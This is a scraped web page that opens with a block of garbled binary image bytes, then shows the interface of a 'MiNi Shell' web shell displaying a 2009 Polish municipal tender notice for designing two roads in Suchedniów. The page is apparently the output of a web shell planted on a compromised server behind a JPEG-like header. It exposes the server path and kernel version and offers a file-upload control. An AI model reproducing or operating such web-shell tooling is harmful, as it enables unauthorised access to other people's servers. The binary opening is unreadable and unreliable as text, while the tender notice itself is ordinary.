JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20091009/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20091009/173807-N-2009.html

<p class="kh_header"><b>Suchedniów: OPRACOWANIE PROJEKTÓW  BUDOWLANYCH :
Budowa ulicy Stokowiec i Szerokiej  wraz z budową,  przebudową , rozbudową   infrastruktury komunalnej.</b><br>
<b>Numer ogłoszenia: 173807 - 2009; data zamieszczenia: 09.10.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Suchedniów , ul. Fabryczna 5, 26-130 Suchedniów, woj. świętokrzyskie, tel. 041 2543002, 2543485, faks 041 2543485.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.suchedniow.bip.doc.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> -</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> OPRACOWANIE PROJEKTÓW  BUDOWLANYCH :
Budowa ulicy Stokowiec i Szerokiej  wraz z budową,  przebudową , rozbudową   infrastruktury komunalnej..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> OPRACOWANIE PROJEKTÓW  BUDOWLANYCH :
Budowa ulicy Stokowiec i Szerokiej  wraz z budową,  przebudową , rozbudową   infrastruktury komunalnej.

I.Lokalizacja projektu :     GMINA SUCHEDNIÓW	          		
Budowa ulicy Stokowiec i Szerokiej  wraz z budową,  przebudową , rozbudową   infrastruktury komunalnej.
		                         26-130 Suchedniów
		                         powiat skarżyski, województwo świętokrzyskie
II.Opis przedmiotu zamówienia :
OPIS  TECHNICZNY:
OPIS PRZEDMIOTU ZAMÓWIENIA :
Przedmiotem projektu jest opracowanie projektu budowlanego budowy dróg o długości 3.355,00mb.:
-ulica Stokowiec -przebudowa -  droga gminna - odcinek od ul. Langiewicza /włączenie teren PKP/ do działki nr ewid. geod. 157/ droga wraz z chodnikiem i zjazdami do wszystkich działek, odwodnieniem, przebudową kolidującej infrastruktury technicznej, /nawierzchnia asfaltobeton,  chodniki z kostki brukowej/, ciąg pieszo-jezdny działka nr ewid. geod. 444/3 strona wschodnia.
Uwaga:  odcinek od ul. Langiewicza do ul. Szerokiej należy zaprojektować zgodnie z planem zagospodarowania przestrzennego, natomiast dalszy odcinek należy nawiązać do istniejących uwarunkowań z tym, że chodnik należy zaprojektować jako jednostronny strona wschodnia do przejazdu PKP, pozostały  do działki nr ewid. geod.  310/1, odcinek od przejazdu PKP do działki nr ewid.geod. 157 jednostronnie utwardzone pobocze/
-ulica Szeroka - budowa - droga gminna / odcinek od ul. Stokowiec do wysokości działki 5296/1/ /droga wraz z chodnikami i zjazdami do działek, odwodnieniem, przebudową kolidującej infrastruktury technicznej, (nawierzchnia asfaltobeton,  chodniki z kostki brukowej/,,
Uwaga:  ul. Szeroka należy zaprojektować zgodnie z planem zagospodarowania przestrzennego
-wykonanie map sytuacyjno-wyskościowych do celów projektowych,
-wykonanie map zawierających projekty podziału nieruchomości,
-wykonie analizy powiązania drogi z innymi drogami publicznymi,
-opracowanie projektu organizacji ruchu wraz z uzgodnieniami w 5 egz.,
-opracowanie operatu wodno-prawnego na zrzut wód deszczowych i uzyskanie pozwolenia wodno-prawnego,
-opracowanie specyfikacji technicznej wykonania i odbioru robót - 5 egz. papierowych + 1egz.  w wersji elektronicznej,
-opracowanie kosztorysu inwestorskiego w 1 egz. papierowej  i przedmiaru robót w 5 egz i 1egz.  w wersji elektronicznej,
-wystąpienie do Wojewody Świętokrzyskiego i Starosty Powiatu Skarżyskiego i uzyskanie w imieniu Zamawiającego decyzji o zezwoleniu na realizację inwestycji drogowej /Dz.U. 2008 nr 154 poz. 958/.
-wykonanie wykazu właścicieli gruntów objętych inwestycją w 5 egz. papierowych i 1egz. elektronicznej  oraz uzyskanie zgód na prowadzenie robót /prawo do dysponowania gruntem w celu realizacji zamierzenia/ w 2 gez. papierowych.,
-projekt budowlany i projekt zagospodarowania terenu i projekty branżowe należy opracować w 5 egz. papierowych + 1egz.  w wersji elektronicznej,
-wystąpienie i uzyskanie decyzji o środowiskowych uwarunkowaniach zgody na realizację przedsięwzięcia.
UWAGA:
pozostałe zgodnie z obowiązującymi przepisami, a w szczególności : 
Rozporządzenie Ministra Transportu i Gospodarki Morskiej z dnia 02.03.1999 w sprawie warunków technicznych, jakim powinny odpowiadać drogi publiczne i ich usytuowanie /Dz.U. Nr 43, poz. 430 z 1999 roku/,  

Ustawa z dnia 27.04.2001 roku  Prawo Ochrony Środowiska  z późń.zm.
	
Rozporządzenie Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej , specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego /Dz. U. Nr 202, poz. 2072/ 
Rozporządzenie Ministra Infrastruktury z dnia 22 kwietnia 2005 r. zmieniające rozporządzenie w sprawie szczegółowego zakresu i formy dokumentacji projektowej , specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego /Dz. U. Nr 75, poz. 2075/ 
Rozporządzenie Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie  określania metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym /Dz. U. Nr 130, poz. 1389/

Rozporządzenie Ministra Infrastruktury z dnia 12.04.2002 r. w sprawie warunków technicznych jakim    powinny odpowiadać budynki i ich usytuowanie. Dz.U.02.75.690.     Zmiany:    Dz.U.03.33.270, Dz.U.04.109.1156

Ustawa z dnia 07.07.1994 r. - Prawo budowlane. Obwieszczenie Marszałka Sejmu RP z dnia 21.11.2003 r. 
Jednolity tekst Dz.U.03.207.2016
Zmiany: Dz.U.04.6.41 art.2, Dz.U.04.92.881, Dz.U.04.93.888, Dz.U.04.96.959 art.23, Dz.U.05.113.954 art.3, Dz.U.05.163.1362 art.23, Dz.U.05.163.1364, Dz.U.05.169.1419 art.48, Dz.U.06.12.63 art.2.

Rozporządzenie Ministra Transportu i Gospodarki Morskiej z dnia 30 maja 2000 r. w sprawie warunków technicznych jakim powinny odpowiadać drogowe obiekty inżynierskie i ich usytuowanie. 

Rozporządzenie Ministra Infrastruktury z dnia 3.07.2003 r. w sprawie szczegółowego zakresu i formy projektu budowlanego..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 74.22.50.00-2, 74.23.20.00-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie dotyczy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Art. 22. 1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:
	1)	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
	2)	 posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
	3)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
	4)	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.
2. Zamawiający nie może określać warunków udziału w postępowaniu o udzielenie zamówienia w sposób, który mógłby utrudniać uczciwą konkurencję.

2. udzielą gwarancji na wykonane prace projektowe do upływu gwarancji jaką udzieli Wykonawca zadania na podstawie przedmiotowego projektu,,
3. wykażą się odpowiednim doświadczeniem, tj. w okresie 3 ostatnich lat/ a jeżeli okres   prowadzenia działalności jest krótszy - w tym okresie/ przed dniem wszczęcia    postępowania wykonali minimum 1 projekt budowlany                 w zakresie budowy dróg i wartości odpowiadającej przedmiotowi postępowania, (uwaga: projekty w tym okresie można sumować),
4. wykażą się, że dysponują osobami, które są zdolne do wykonania zamówienia, tj. w   zakresie projektowym w branżach ,   drogownictwa , kanalizacji deszczowej.
5.ich oferta będzie zgodna z warunkami SIWZ.
W przypadku,  gdy o udzielenie zamówienia ubiega się konsorcjum, wówczas wymaga się,  aby żaden z jego członków nie podlegał wykluczeniu z postępowania na podstawie art. 24       ust. 1 i 2 ustawy
Zamawiający dokona oceny spełniania przez Wykonawców warunków udziału w   postępowaniu na podstawie złożonych w ofercie oświadczeń i dokumentów metodą spełnia - nie spełnia. Wykonawcy  nie spełniający warunków zostaną wykluczeni    z postępowania..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1/formularz ofertowy,

2/aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności            gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;

3/aktualnych zaświadczeń właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;

4/wykazu wykonanych projektów budowlanych w okresie ostatnich trzech lat przed dniem wszczęcia postępowania      o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością projektowi stanowiącemu przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że projekty te zostały wykonane należycie;

5/informacji na temat przeciętnej liczby zatrudnionych pracowników lub liczebności personelu kierowniczego,                   w okresie ostatnich trzech lat, a w przypadku gdy okres prowadzenia działalności jest krótszy - w tym okresie, jeżeli przedmiotem zamówienia są roboty budowlane lub usługi;

6/ wykazu osób i podmiotów, które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności; (uprawnienia : budowlane- branża drogowa, sieci sanitarne, instalacje, aktualne zaświadczenia o przynależności  do izby inżynierów budownictwa ), lub pisemnego zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa wykonawca wskazał osoby, którymi będzie dysponował,

7/oświadczenie o spełnieniu warunków udziału w postępowaniu określone w art.22 ust1 ustawy oraz 
    nie       podlegający wykluczeniu z postępowania o udzielenie zamówienia  na podstawie art.24 ust 1 i 2.

8/oświadczenia :
a/Oświadczenie o zapoznaniu się z terenem i obiektami stanowiącymi przedmiot zamówienia.
b/Oświadczenie o przyjęciu warunków umowy załączonej do niniejszej specyfikacji
c/Oświadczenie o związaniu złożoną ofertą przez okres 30 dni licząc od daty upływu składania ofert.
d/Oświadczenie, że wyliczona wartość brutto zadania jest kompletna i że jej wyliczenie nastąpiło w oparciu o, Specyfikację Istotnych Warunków Zamówienia, wizję lokalną i posiadaną przez oferenta wiedzę techniczną
       e/Informacja czy oferent będzie wykonywał przedmiot w całości osobiście, czy też  za    pomocą         podwykonawców.    
2. Dokumenty, o których mowa w rozdziale VI  niniejszej specyfikacji, należy przedstawić     w formie oryginału lub kopii poświadczonych za zgodność z oryginałem przez osobę/y uprawnioną/e do reprezentacji Wykonawcy.
3.W przypadku konsorcjum do oferty musi być załączony dokument ustanawiający pełnomocnika konsorcjum do reprezentowania go w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i przy zawarciu umowy w sprawie zamówienia publicznego..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.suchedniow.bip.doc.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Inwestycji Komunalnych i Budownictwa - 26-130 Suchedniów, ul. Fabryczna 5, II pietro pok. nr 204.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.11.2009 godzina 09:30, miejsce: Zakład Inwestycji Komunalnych i Budownictwa - 26-130 Suchedniów, ul. Fabryczna 5, II pietro pok. nr 204.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com